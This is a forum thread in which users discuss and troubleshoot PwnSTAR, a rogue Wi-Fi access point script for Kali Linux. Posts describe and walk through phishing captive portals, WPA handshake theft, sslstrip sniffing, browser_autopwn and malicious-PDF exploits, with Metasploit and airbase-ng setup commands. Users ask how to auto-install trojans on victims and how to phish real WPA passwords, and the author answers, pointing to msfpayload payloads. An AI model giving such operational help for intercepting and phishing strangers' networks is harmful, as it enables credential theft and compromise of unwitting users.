Page 1 of 3 123 LastLast
Results 1 to 50 of 112

Thread: PwnSTAR running on Kali

  1. #1
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45

    PwnSTAR running on Kali

    PwnSTAR (Pwn SofT Ap scRipt) now runs on Kali.

    https://github.com/SilverFoxx/PwnSTAR

    Features
    takes care of configuration of interfaces, macspoofing, airbase-ng and isc-dhcp-server
    steals WPA handshakes
    phishes email credentials
    serves webpages: supplied (eg hotspot, below) or provide your own
    sniffing with ferret and sslstrip
    adds a captive portal to the frontend of the fake AP
    assorted exploits
    de-auth with MDK3, aireplay-ng or airdrop-ng

    Use your imagination, craft your own webpages, and have fun.

    Vulpi

    Last edited by Vulpi; 2014-04-19 at 07:03.

  2. #2
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    The README has some ideas on how to use it.
    Code:
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Basic Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        
        1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc
                     no internet access given
        
        2) Grab WPA handshake
        
        3) Sniffing: provide internet access, then be MITM
        
        4) Simple web server with dnsspoof: redirect the victim to your webpage
           
        5) Karmetasploit
        
        6) Browser_autopwn
    1) Relies on auto-connections ie the device connnects without the owner being aware. You can then attempt to exploit it.
    Target the fake-AP ESSID to something the device has likely connected to previously eg Starbucks WiFi

    2) Sometimes it is easier to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target.
    Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap.

    3) Provides an open network, so you can sniff the victim's activities.

    4) Uses apache to serve a webpage. There is an option to load your own page eg one you have cloned. The provided page (hotspot_3) asks for email details.
    Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof.
    DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a better way of hosting hotspot_3

    5&6) Provides all the arduous config files to properly set-up these attacks.


    Browser_autopwn gaining shells against Windows Vista:




    Code:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                       Advanced Menu
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
        a) Captive portals (phish/sniff)
        
        b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)
    
        c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)
        
        d) Java_jre17_jmxbean
        
        e) Choose another browser exploit

    a) Uses iptables rules to route the clients. Is essentially a fully functioning captive portal.
    Avoids the problems of spoofing.

    1) Serves hotspot3. Allows clients onto the internet once credentials are given.

    2) Allows you to add a personal header to the index.php.
    You could probably copy the php functions from this page onto a cloned page and load that instead.

    b) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet.
    Includes a virgin pdf to which you can add your own payload.

    c&d) Launches a couple of example browser exploits

    e) Gives a skeleton framework for loading any browser exploit of your choice.
    Edit PwnSTAR browser_exploit_fn directly for more control.


    Two clients being simultaneously handled by the captive portal:



    Have fun, and READ THE SCRIPT!
    Vulpi
    Last edited by Vulpi; 2014-04-19 at 07:06.

  3. #3
    Join Date
    2013-Mar
    Posts
    269
    Thank you! Love your script
    Fact, Science and the Pursuit of Knowledge. Working to secure your networks from threats; Outside and Within.

  4. #4
    Join Date
    2013-Mar
    Posts
    9
    I will try that out as soon as I have time to install Kali (first release was bugged for me, keyboard stuff).
    I am reading through the code, and it's very neat.


    Vulpi, I used to do the same as you :
    Code:
    read apusage
    	if [[ $apusage = q ]];then
    		exit_fn
        elif [[ $apusage != [1-6] && $apusage != 9 ]];then
            first_fn
        elif [[ $apusage = 9 ]];then
            adv_usage_fn
    	fi
    But I was hinted to use case in ... esac instead, and it's way better. For instance, instead of this barbarian line :"elif [[ $apusage != [1-6] && $apusage != 9 ]];then first_fn" you would jut have to write *) first_fn ;;
    I use some of those in Yamas, you should check it out. It's aslo quite easy to replace. "edit" : I see you use it later on in the script, so you should be all right!

    Code:
                if [[ $var = n ]];then
                    internet=
                    interface_fn
                fi
                if [[ $var = y ]];then
                    if [[ $apusage = 3 || $apusage = a || $apusage = b || $apusage = c ]];then
                        echo -e "$warn\nDuh, won't work without an internet interface. Start again"
                        sleep 2
                        interface_fn
                    fi
                fi
    Shouldn't that be one big if with sub ifs, and an elif in case neither y nor n are entered ?

    Code:
    $API is in use, stupid. Try another interface
    Code:
    elif [[ $initial_scan != n ]];then  # any value other than n restarts the function
            echo -e "$warn\nWhat's it gunna be babe...yes or no?"
    ahah Havin' fun are ya boy ?

    Code:
    echo -e "$info\nConsider using yamas or easy-creds to parse logs"
    cheers!

    Code:
    echo "use auxiliary/server/browser_autopwn" > /tmp/karma.rc
        echo "setg AUTOPWN_HOST $ap_ip" >> /tmp/karma.rc
        echo "setg AUTOPWN_PORT 55550" >> /tmp/karma.rc
        echo "setg AUTOPWN_URI /ads" >> /tmp/karma.rc
        echo "set LHOST $ap_ip" >> /tmp/karma.rc
        echo "set LPORT 45000" >> /tmp/karma.rc
        echo "set SRVPORT 55550" >> /tmp/karma.rc
        echo "set URIPATH /ads" >> /tmp/karma.rc
        echo "run" >> /tmp/karma.rc
    
    ---SNIP---
    Why not :
    Code:
    echo -en "setg AUTOPWN_HOST $ap_ip
    setg AUTOPWN_PORT 55550
    setg AUTOPWN_URI /ads
    set LHOST $ap_ip
    ---SNIP---
    set URIPATH /ads
    run" > /tmp/karma.rc
    since you're always writing in the same file?

    That's all for now! More feedback when I get my hand on it!
    Last edited by sickn3ss; 2013-04-12 at 20:59.

  5. #5
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Thank you! Love your script
    Thanks charonsecurity. Let me know if you find any bugs.

  6. #6
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    I am reading through the code, and it's very neat
    I should hope so - the first script I ever studied was yamas!

    All your comments are valid. The script started out very small; as it grew I simply added more elifs etc. If I was starting from scratch I would do things differently - but I'm too lazy to re-write it!

    PS It only took me a few minutes to get yamas running on Kali - your fans are waiting

  7. #7
    Join Date
    2013-Apr
    Posts
    2
    Hi, it's a great tools....
    But i try to change Portal_simple php. How many I can change the email and password default page to password 1 and password 2?
    if password 1 and password 2 are the same itīs ok you are authorized.

  8. #8
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){ 
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.

  9. #9
    Join Date
    2013-Apr
    Posts
    2

    Smile

    Quote Originally Posted by Vulpi View Post
    In index.php, change this line to whatever you want (presumably "Email address" to "Password 1"):
    PHP Code:
     <tr><td>Email address:</td><td><input type='text' name='email'></td></tr
    In service.php, this is the line to change:
    PHP Code:
     if(($email == "") || ($password == "")){ 
    You probably want something like "if $email != $password" etc.
    There are lots of good "learn php in a weekend" tutorials on the net.
    I change you're portal_simple to this,
    portal_simpleOK.rar (10 KB)
    https://mega.co.nz/#!fpZFjYQA!ObqAaU...vBk2Oc28zSoVag
    The original is from Technic Dynamic.
    Now if password is wrong or blank, show error.
    If you can put this in a named portal like "portal_wpa" in you're next release.
    Enjoy.
    Last edited by jamyz; 2013-04-24 at 06:12.

  10. #10
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    I can't access the mega download. However, the WPA pages by Deathcorps (http://www.backtrack-linux.org/forum...ad.php?t=47021) do work for me. If you are having problems the first thing I would suggest is to check all the permissions are correct (see script readme).

    This attack doesn't need hardcoding into PwnSTAR. The idea is that you can use the script to launch whatever cloned website you wish (Basic menu option 4 "Simple web server with dnsspoof").

  11. #11
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Written to textfile.txt, and tailed in an Eterm window (seen in the image in post #2 of this thread). If this isn't happening, my first suggestion is to check the permissions eg is textfile writeable?


    Edit: Forgot my own script! "Formdata.txt" it is.
    Last edited by Vulpi; 2013-05-12 at 13:36. Reason: Oops

  12. #12
    Join Date
    2013-Apr
    Posts
    32
    The permissions are ok... The Etern window still shows nothing. I am using "formdata.txt" which is situated in /var/www/hotspot_3. Maybe it has something to do with the apache server, I got this message when your script is launching it: "NameVirtual Host: *80 has no VirtualHosts".

    WOuld you mibd helping me to set the apache server correctly?

    EDIT: Ok, nevermind, I got rid off the "NameVirtualHost *:80" line in etc/apache2/ports.conf; and I used portal_hotspot instead of hotspot_3 : worked.

    I would add that spoofing the mac address prevents the victim to connect to the rogue AP.
    Last edited by xxyxxyxx; 2013-05-09 at 19:56.

  13. #13
    Join Date
    2013-May
    Posts
    14
    hello , im newbie on linux
    (using since bt4 , but no good , just folow how to )

    i got many probleme with kali ,
    im looking for use pwnstar , but it seem not on kali ,
    any "how to" download & install it on linux ( step by step ? )

    thank's to help

  14. #14
    Join Date
    2013-Jul
    Posts
    2

    Feedback

    Hi,

    I have recently discovered PwnSTAR.

    Thank you very much for publishing such a useful script. I really love it.


    I would like to give you some feedback about it.

    1. Provide a Hotspot; grant Internet access; sniff:
    Great attack vector; I was easily able to sniff credentials ( on my own network ); steal cookies / session IDs

    2. A smart idea to rely on autoconnet:

    My setup;
    Wifi network;
    Kali on an I5 CPU with decent RAM as the main OS ( not in VM ); internal wireless adapter; Alfa Awus 036H external wireless card
    WIN 7 on another machine
    WIN XP SP3 on another machine
    Android 4.1 on my Smartphone.

    I have set up a Honeypot AP on the same channel as my Wifi network with the same name as my Wifi network.
    Turned off my Wifi, devices connected flawlessly to the Honeypot AP.

    But then turned on my Wifi network;
    placed my Alfa Awus antenna directly near the XP, Win 7 and android devices;

    Deauthenticated these devices off of my Wifi network
    I was hoping that the victim devices would connect to my Honeypot AP since the Alfa Awus signal is relatively strong.
    and was placed right near the victim devices;
    but no chance to have the devices connect to my Honeypot.

    So I assume that this kind of attack is only suitable if for example victims leaves Starbucks; I follow him and have his device
    autoconnect to my Honeypot AP;
    I would have IP level connectivity, could exploit the machine via metasploit
    but that would take most probably longer than I would be connected to the victim
    I suppose there is little chance to be successful with this kind of attack.
    Do you agree?

    3. Attack via Karmetasploit; browser pn, malicious pdf expoit; Java Applet Exploit
    All of them are very good attack vectors;
    I would focus on the Java Applet Attack Vector; I suppose it is the most successful attack of those 4
    I prefer client side attacks.....

    Your script is more than excellent.
    I just have the problem that the internet access which my victims get is very slow;
    what could be the reason? I am on a decent CPU with decent RAM; have a 50MBit line and good wireless card
    So maybe you could give me some advice.

    What I would love to have in your script is the following:
    An exploit which is deployed either via malicious PDF or Java Applet;
    the exploit should download a crypted malicious code from an internet server
    ( a Trojan or a Virus; for example a DNS changing virus / proxy trojan )

    Sure I could do that myself on the victim machine as soon as I have a meterpreter session or shell
    ( could even do it later via meterpreter reverse tcp over no-ip.com or similar )
    but I would love to have the installation of malicious code on the victim automated;

    Is there such an exploit?

    Cheers
    Sam
    Last edited by Ollsen; 2013-07-07 at 08:23.

  15. #15
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Hi Sam, thanks for taking an interest - I always appreciate feedback.

    with the same name as my Wifi network...no chance to have the devices connect to my Honeypot
    Your home network is presumably WPA(2), so no device will auto-connect to an open network, even of the same name. If only it were that easy!

    So I assume that this kind of attack is only suitable if for example victims leaves Starbucks...
    Almost correct. Another possibility is to have a naiive user, DOSed off their own network, then, in frustration, manually connect to your fake AP.

    I suppose there is little chance to be successful with this kind of attack.
    Do you agree?
    Yes, I do. I think the most successful ways of using PwnSTAR (apart from learning/demonstrating) are 1) sniffing on a fake open network (eg "Free WiFi"), and 2) a targeted attack with a specially crafted webpage.

    I just have the problem that the internet access which my victims get is very slow; what could be the reason?
    I think part of the problem is airbase itself. It's doing a lot of work - it's almost a miracle it works at all. It also varies a lot between wifi drivers. Remember 036H is only transmitting at "g" speeds (although I find the 036NH to be even worse). I posted somewhere on the old forums the download speeds I was seeing.

    What I would love to have in your script is the following...
    You can do this yourself! For example, in /www/portal_pdf/ is a virgin pdf template. You can use msfpayload to add whatever exploit you wish. Another option is to look at Beef. One day I will integrate it into PwnSTAR.

    PS The development version of pwnSTAR is at github, not googlecode - https://github.com/SilverFoxx?tab=repositories. It's not getting much love from me at the moment I'm afraid.

  16. #16
    Join Date
    2013-Jul
    Posts
    2
    Hi Vulpi,

    thank you very much for your help.

    Really very much appreciated; you comments have answered all my questions.

    Best Regards
    Sam
    Last edited by Ollsen; 2013-07-11 at 10:06.

  17. #17
    Join Date
    2013-Jul
    Posts
    5
    Looks intresting might give it a shot later,

  18. #18
    Join Date
    2013-Mar
    Posts
    4
    Quote Originally Posted by Vulpi View Post

    I think part of the problem is airbase itself. It's doing a lot of work - it's almost a miracle it works at all. It also varies a lot between wifi drivers. Remember 036H is only transmitting at "g" speeds (although I find the 036NH to be even worse). I posted somewhere on the old forums the download speeds I was seeing.
    Hi,

    i tried various tools to set up a Wifi Honeypot ... all with the same result: the vic speed is so **** slow ... ex. open facebook takes about 1-2 min.
    I also tried different hardware (dedicated intel quadcore cpu / 16 gb ram / vmware install on i7 / setup on netbook with atom) and used different wifi adapter (alfa awus036h / nh / nhr).

    my internet connection was direct eth0 --> router --> 50mbits internet

    is it a configuration problem or a fundamelntal issue with fake APīs ?

    This causes a MITM Attack is not workable for me :/
    Last edited by aCiD187; 2013-08-06 at 11:31.

  19. #19
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Hi aCiD187,

    Fake APs are definitely slow, but nothing like the degree you are describing. I usually manage speeds similar to free public WIFI's - slow but quite useable.

    Perhaps monitor AP and victim in wireshark to see if that suggests anything to you. Also check DNS caching. I discussed that in the previous forum; it can give multiple timeouts for previously accessed pages.

  20. #20
    Join Date
    2013-Sep
    Posts
    2
    Hi I running the script on mac through kali inside VMware fusion. I have eth0 as the bridged internet connected adapter so I am using it as the interface for internet connection when setting up a fake AP. I am having trouble however because eth0 keeps loosing its internet connection and sometimes won't come back on unless I stop the script. Sorry if you have already solved a similar problem.

  21. #21
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    I'm using the same setup on a macbook air without problem so I'm not certain. One possibility is that the script is trying to macchange eth0. The "dev" version of the script fixes this. Try it at https://github.com/SilverFoxx/PwnSTA...er/PwnSTAR-dev

  22. #22
    Join Date
    2013-Jul
    Posts
    818
    Dear Vulpi the Musket Team likes your work!!! - however we wish to note that when we tried to actually connect to the rogueAP we are unable to do so. As we have run across this before with kali, we suspected that there is something wrong with the isc-dhcp-server that is required by network manager. To correct this we simply used dnsmasq. You can find a WPA phishing program for kali by us in these forums and a download link. We used the config file from that program and added one line of code in your script or dnsmasq -C /ect/dnsmasq.conf. When we did that we immediately got the webpage up. In fact it worked so fast that we are in the process of importing our WPA phishing apporach into your program but that will take some time. How to install dnsmasq and all the info you need can be found in https://forums.kali.org/showthread.p...available-here. There is also a posting in aircrack-ng which may have further info.

  23. #23
    A brilliant script.. Thank you for it... But I have one question.. You use a fake Ap and then do various stuff with it... Why not use arp poisoning? It would have better success rates as opposed to fake Ap...

  24. #24
    Join Date
    2013-Nov
    Posts
    68
    Hi Vulpi,

    How to I used Easy-creds to parse the captured sslstrip.log?
    I tried but it said no info, on the AP there was client, i tried with my devices.
    Thanks for your help.

  25. #25
    Join Date
    2013-Jul
    Posts
    818
    Dear Vulpi,
    We have just noticed that ALL our phishing programs have ceased to function in kali linux. This includes pwnstar9.0. All these programs run fine AND we can associate to the AP using the isc-dhcp-server and or dnsmasq depending on program BUT the client cannot bring down the web pages. As all these programs in four different computers were working fine a week ago so we suspect it is in apache 2 not the isc-dhcp-server as we have other programs that ise dnsmasq. We have updated all of these computer and we are very familiar with the permissions problems etc. Would you consider running your version and have a client try and bring up the web pages. We have test selection 4 with no internet access and 9 a in your program. In fact internet access leaked thru via torrents but we cannot get any web pages in any phishing program to be displayed.

    MTA/MTB

  26. #26
    Thanks! PwnSTAR ROCKS!!!

  27. #27
    Join Date
    2013-Oct
    Posts
    8
    Hey I'm trying to condense the softAP + internet commands in PwnStar into just the commands. I have pulled the following form the script but I must be missing something:

    iptables --flush # delete all rules in default (filter) table
    iptables -t nat --flush
    iptables -t mangle --flush
    iptables -X # delete user-defined chains
    iptables -t nat -X
    iptables -t mangle -X
    echo "1" > /proc/sys/net/ipv4/ip_forward # enable kernel forwarding
    iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
    airbase-ng -Z 4 -W 1 -c <channel> -e "SSID" -v mon0 2> /dev/null &
    sleep 6
    modprobe tun # probably not necessary
    ifconfig at0 up 172.16.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400

    echo > /var/lib/dhcp/dhcpd.leases # Clear any pre-existing dhcp leases
    cat /dev/null > /tmp/dhcpd.conf

    DHCP setup:
    default-lease-time 300; > /tmp/dhcpd.conf
    "max-lease-time 360;" >> /tmp/dhcpd.conf
    "ddns-update-style none;" >> /tmp/dhcpd.conf
    "authoritative;" >> /tmp/dhcpd.conf
    "log-facility local7;" >> /tmp/dhcpd.conf
    "subnet <subnet like 192.168.0.0> netmask <subnet mask like 255.255.255.0> {" >> /tmp/dhcpd.conf
    "range <192.168.0.2 192.168.0.50>" >> /tmp/dhcpd.conf
    "option routers $ap_ip;" >> /tmp/dhcpd.conf
    "option domain-name-servers 8.8.8.8;" >> /tmp/dhcpd.conf
    "}" >> /tmp/dhcpd.conf

    dhcpd -cf /tmp/dhcpd.conf ********* ERROR HERE
    route add -net <subnet like 192.168.0.0> netmask <subnet mask like 255.255.255.0> gw <gw IP like 192.168.1.1>
    iptables -P FORWARD ACCEPT # probably not necessary 'coz we flushed the chains earlier


    This however fails when I run the command `dhcpd -cf /tmp/dhcpd.conf` with:

    No subnet declaration for at0 (172.16.0.1).
    ** Ignoring requests on at0. If this is not what
    you want, please write a subnet declaration
    in your dhcpd.conf file for the network segment
    to which interface at0 is attached. **

    What am I missing? (dhcp.conf is set up correctly, I'm not just blindly copy/pasting there at least)

  28. #28
    Join Date
    2013-Jul
    Posts
    818
    We would start by checking the permissions on your dhcp.conf

  29. #29
    Join Date
    2013-Mar
    Posts
    5
    I have a problem reconnecting to the Internet after I have started the script.
    I run it and select option 3 - the MITM mode.
    At the point it says to reconnect I can't. What should I be doing to reconnect. I can ping the gateway but not anything on the internet.

    Any help would be great

    Thanks

  30. #30
    Join Date
    2013-Oct
    Posts
    8
    Quote Originally Posted by mmusket33 View Post
    We would start by checking the permissions on your dhcp.conf
    And you would be 100% correct sirs. Thank you.

  31. #31
    Join Date
    2013-Jul
    Posts
    818
    To YourMum,

    Things that can make pwnstar not function properly are many but it is not in the coding. There are two main problems. Network-Manager can intrude into your operation. And your file permissions can be improperly set.

    We suggest you go to this link read the threads and download the files. One of the files has a long help file.

    http://forum.aircrack-ng.org/index.php/topic,414.0.html

    Next setup a simple web server item 4. Do not offer internet access and see if you can associate to the rogueAP with another computer then log on and enter a password which you can collect by reading the formdata.txt file in the folder that provides the web page.

    If this works then try setting up the same simple web server and provide internet access. When you get that working go to item 9 advanced and choose item (a) Captive portals. Provide internet access and see if you can enter a password.

    Read the help file in the download it will take you thru most of the problems. It is directed at setting up WPA phishing but it stilll addresses most of the basic problems you will encounter

    In closing if your linux has been updated and upgraded pwnstar functions fine. Currentlly we have three computers that run pwnstar and they all run pwnstar fine. Even our persistent usb version works.

    Make sure you apache program is up to date we think it is apt-get install apache2. and that your isc-dhcp-server is installed
    as well as incron

    Pwnstar will install it for you if you have internet access when you run the program

    Network Manager can interfere with the ability to associate to the rogueAP if it tries to use your wifi device when running. pwnstar. And if the device actually providing internet access is not actually connected to the internet the webpage will fail.
    MTC

  32. #32
    Join Date
    2013-Mar
    Posts
    5
    Thanks for the pointers. It seems I have a more serious issue as I have no network connectivity at all since running the script. I dual boot Kali with ubuntu and that cannot connect. I'll resolve that and follow your steps to see how I get on

    Thanks

  33. #33
    Join Date
    2013-Mar
    Location
    localhost
    Posts
    40
    i like that tool , works as charm ! nice post
    root-developers community owner
    www.root-developers.org/forum/

  34. #34
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    This project has now moved to Github: https://github.com/SilverFoxx

    There have been a few incremental changes, nothing too major.

  35. #35
    Join Date
    2013-Aug
    Location
    Italy
    Posts
    65
    Quote Originally Posted by Vulpi View Post
    This project has now moved to Github: https://github.com/SilverFoxx

    There have been a few incremental changes, nothing too major.
    many tnx Vulpi real nice work
    Est modus in rebus
    cd /usr/bin/bad

  36. #36
    Join Date
    2013-Nov
    Posts
    68
    The tool is awesome. But most of people are using their iDevices with apps and this tool unable to capture the info. Are we working on modifying the tool to capture info from apps? Thank you.
    Where is the darn "any key" key?

  37. #37
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    Thanks Devil_D.

    @thepoor. Is there a specific problem with the script; or is this merely the fact that SSLStrip is becoming less effective over time?

  38. #38
    Join Date
    2013-Nov
    Posts
    68
    Quote Originally Posted by Vulpi View Post

    @thepoor. Is there a specific problem with the script; or is this merely the fact that SSLStrip is becoming less effective over time?
    Hi Vulpi,

    The SSLStrip just not able to get the info from apps (Facebook, mail, tweeter). it works perfectly on the browsers.
    Where is the darn "any key" key?

  39. #39
    Join Date
    2013-Mar
    Location
    Totally lost
    Posts
    45
    SSLStrip no longer works on many of the big web apps (Gmail, FB etc). Fixing this is way beyond my abilities. Ettercap may be better in the long-term; I'll look at adding it as an option.

  40. #40
    Join Date
    2013-Jul
    Posts
    818
    Our Teams have encountered problems when running PwnStar9.0 that are NOT the fault of the program! When running this program we suggest you do the following:

    After installation you must check the functionality of the system not just the program. To test we suggest you run item 4 in the basic menu and do not provide internet access. Run up a second computer to simulate a client and do the following tests.

    1. See if the rougueAP you have established it seen by the client computers’ wifi device. If the rogueAP name you setup is not seen shut down PwnStar9.0 and run thru the program setup again, you have probably done something wrong as you responded to the menu driven setup. Also with some laptops the network manager of the computer running the rogueAP must be enabled but not associated to any wifi station. Right click on the network manager icon (two computers upper right on screen) then click on Enable Networking. You now should see a check mark next to Enable Networking. Now start PwnStar9.0 again.

    2. Once the client computer can see the rogueAP name, use the client computer to try and associate to the rogueAP. If you cannot, more then likely network manager in the rogueAP computer is using the rogueAP’s wifi device to associate to a wifi station and/or trying to associate to a station. Do not unenable wifi manager. Simply allow network manager to associate to a wifi station and then left-click on network manger and in the drop down window, disconnect the device from the AP. The rogueAP device is now free, allowing the client computer to associate to the rogueAP.

    Some wifi devices cannot associate to this rogueAP set up by PwnStar. For example Broadcom Wireless Utility 802.11n(Broadcom BCM4313 8902.11b/g/n) will only associate occasionally if at all. There may be others. So do not use this wifi device to test Pwnstar.

    3. If your client computer obtains association to the rogueAP, use your web browser and attempt to bring up the phishing web page.

    If you get an apache2.2 webpage error when trying to bring up the web page, the problem is in the permissions you set for the files in the /var/web/ folder BUT manually setting them thru Application/Files etc will not solve the problem. The solution is to open a terminal window and type:

    chmod -R 777 /var/www/

    This will allow read and write to all the files in that folder to all access levels and allow executing as a program. If you do not like that level of permissions setting then:

    chmod -R 755 /var/www/

    This will allow read and execute to groups and others but there is a problem. The formdata.txt file would then not allow the client computer to write to it and therefore any code phished would be lost. So try using the Applications/File/properties/permissions set the formdata.txt. file to allow read and write at all levels and execute as a program.

    Now try and bring up the web page.

    If the page cannot be found make sure your browser is requesting a simple http:// site like http://google.com etc. The dnsspoof program does not like https:// or some long complicated web pages. Writing a custom page for dnsspoof never worked for us.

    3. Once you have the phishing web page expressed on your client's computer screen enter a code and see if it is written to the formdata.txt file. Go to the formdata.txt. file in the folder for the phishing web page you chose to setup. If the code is not seen either the permissions are incorrectly set or you have gone to the wrong folder in /var/www/

    If the code is seen, thank the author of PwnStar for all his work and then go phishing.

    Musket Team A and C
    Last edited by mmusket33; 2014-04-30 at 04:48.

  41. #41
    Join Date
    2014-Jun
    Posts
    5
    Hey Vulpi, great work on this script!

    I'm having difficulties getting anything written to formdata.txt. I ran chmod -R 777 /var/www/ in the /var/www/ folder and double checked the permissions on formdata.txt but nothing I enter into the phishing page gets saved.

    Additionally, the deauth isn't kicking clients from the target AP. I was able to associate with my router (the target router) despite pwnstar sending deauths.

    Any thoughts on what might be the problem?

  42. #42
    Join Date
    2013-Jul
    Posts
    818
    Are you going to the correct formdata.txt file in the correct folder. Remember each webpage folder has a formdata text file. Furthermore manually look to see if the permissions are set properly.

    MTC

  43. #43
    Join Date
    2014-Jul
    Posts
    1
    I'm having a few issues using this script.

    I am trying to setup a fake AP with internet access trying to sniff information. I am using option 3, of course.

    I am using a Alfa AWUS036NH as the device that is my fake AP, and my internal realtek (I cant remember the exact model number. Can be gotten if needed.) for internet access.

    The first issue I'm having is that; my AP broadcasts fine, but when I try connecting to it on my alternate laptop which has Windows 7, it says that it cannot connect. The same is true for my Android 4.4; detects fine, but can't connect. This is obviously a big issue.

    Secondly, when airbase-ng starts up, it goes fine until a few lines down where it has the error: "Got channel -1, expecting channel >0", where it would stop, then continue on with receiving probes. However, I distinctly remembering setting my Soft-AP channel to 1. Odd.

    Third, I do not know where to get ferret. When I say yes to using ferret, the terminal opens, then closes after saying "no such file found" (paraphrased). If it matters, I used lazylinux to install PwnStar.

    Does anyone have any solutions?

  44. #44
    Join Date
    2013-Jul
    Posts
    818
    We will try and address a few of these problems but we are only guessing as we have never seen such.

    1. Are you using Kali-linux 1.07?
    2. Vulpi the author has issued an updated version a few months ago you should download this.
    3. We do not know what you mean when you say you installed Pwnstar9.0
    You will though have to install two programs which Pwnstar9.0 will prompt you to install - incron and one other.

    4. You should use your AWUSO36NH with airbase-ng.
    5. Read thru all the entries in this thread
    6. Setup item 4 and do not provide internet access first, - read our suggestions in the threads above. If your network-manager is trying to use your wifi device supporting airebase-ng to associate to a wifi station then association to your fakeAP is impossible.

    You may be having a negative-one issue with airbase-ng BUT we are only guessing. Go here:

    https://forums.kali.org/showthread.p...t=negative-one

    You can download the script files at the link. Or you can try these commands which should work with your AWUSO36NH

    airmon-ng stop mon0
    airmon-ng stop mon1
    airmon-ng stop mon2
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    ifconfig wlan0 up
    iwconfig wlan0
    ifconfig wlan0 down
    macchanger -r wlan0
    iw reg set BO
    ifconfig wlan0 up
    iwconfig wlan0 channel 13
    iwconfig wlan0 txpower 30
    iwconfig wlan0 rate 1M
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -r mon0
    ifconfig mon0 up

    Now try running Pwnstar and see if you are getting the channel hopping with airbase-ng.

    If the channel problem remains try running airbase-ng from a terminal window and see what you get.


    We cannot help you with ferret sorry.

    MTB
    Last edited by mmusket33; 2014-07-13 at 10:52.

  45. #45
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    hello! using your great script as a newbie, however finding it extremely simple to use! just a question....on "official" captive portals like those in shops, airports and so on, once connected i always receive a notification that brings me to the auth page, whether i am using a pc with windows, a mobile with android or an iphone. this way it' always sure i digit keys to authenticate. is it possible to implement this on a rogue portal page? using the portal pages included in pwnstar doesn't prompt nothing, so when i try to log into my evil twin i am testing i simply don't know if the fake page works or not, unless i open an internet page and go to www.google.com or other short, direct sites (this is another problem i have) . this is quite problematic on mobile, because most of the time nobody surf the web via browser, but using the various apps (facebook, twitter and so on) and making totally useless the captive portal page... any help please? thanks

  46. #46
    Join Date
    2013-Jul
    Posts
    818
    You will increase the ability of a client to bring up your webpage if you use 9 a ie Advanced menu Captive Portals and provide internet access. Dnsspoof doesnot work very well. There are also other problems which 9a solves easily.

    MTC

  47. #47
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    Quote Originally Posted by mmusket33 View Post
    You will increase the ability of a client to bring up your webpage if you use 9 a ie Advanced menu Captive Portals and provide internet access. Dnsspoof doesnot work very well. There are also other problems which 9a solves easily.

    MTC

    thanks for your answer. unfortunately if i use option 9 and give internet access any iphone/android app connected to the ap simply completely bypass the captive portal, and the device has full internet access without giving credentials...routing doesn't work at all

  48. #48
    Join Date
    2013-Jul
    Posts
    818
    We are not the author of PwnStar9.0 just a user. We do not use iphone or android apps - however your problem interests us therefore if our team can get access to iphone/ android we will test it. To be fair we do not understand exactly what information you are trying to obtain. Are you using the login pages supplied by pwnstar to gain login data or are you trying to obtain e-mail username password pairs.

  49. #49
    Join Date
    2014-May
    Location
    Valencia
    Posts
    48
    Quote Originally Posted by mmusket33 View Post
    We are not the author of PwnStar9.0 just a user. We do not use iphone or android apps - however your problem interests us therefore if our team can get access to iphone/ android we will test it. To be fair we do not understand exactly what information you are trying to obtain. Are you using the login pages supplied by pwnstar to gain login data or are you trying to obtain e-mail username password pairs.
    i am trying to create a rogue ap with a fake portal page where the user have to digit his real wpa pass to proceed. the problem is that if the user access the ap with a smartphone/ipad/tablet and not a pc (as most people now does) the portal page isn't shown, so if i give internet connection via pwnstar the user has complete internet access without giving keys, while if i don't give internet access looks like the ap has problems because every page times out, and so the user quit it
    Last edited by forumkali@yopmail.com; 2014-07-28 at 07:37.

  50. #50
    Join Date
    2013-Jul
    Posts
    818
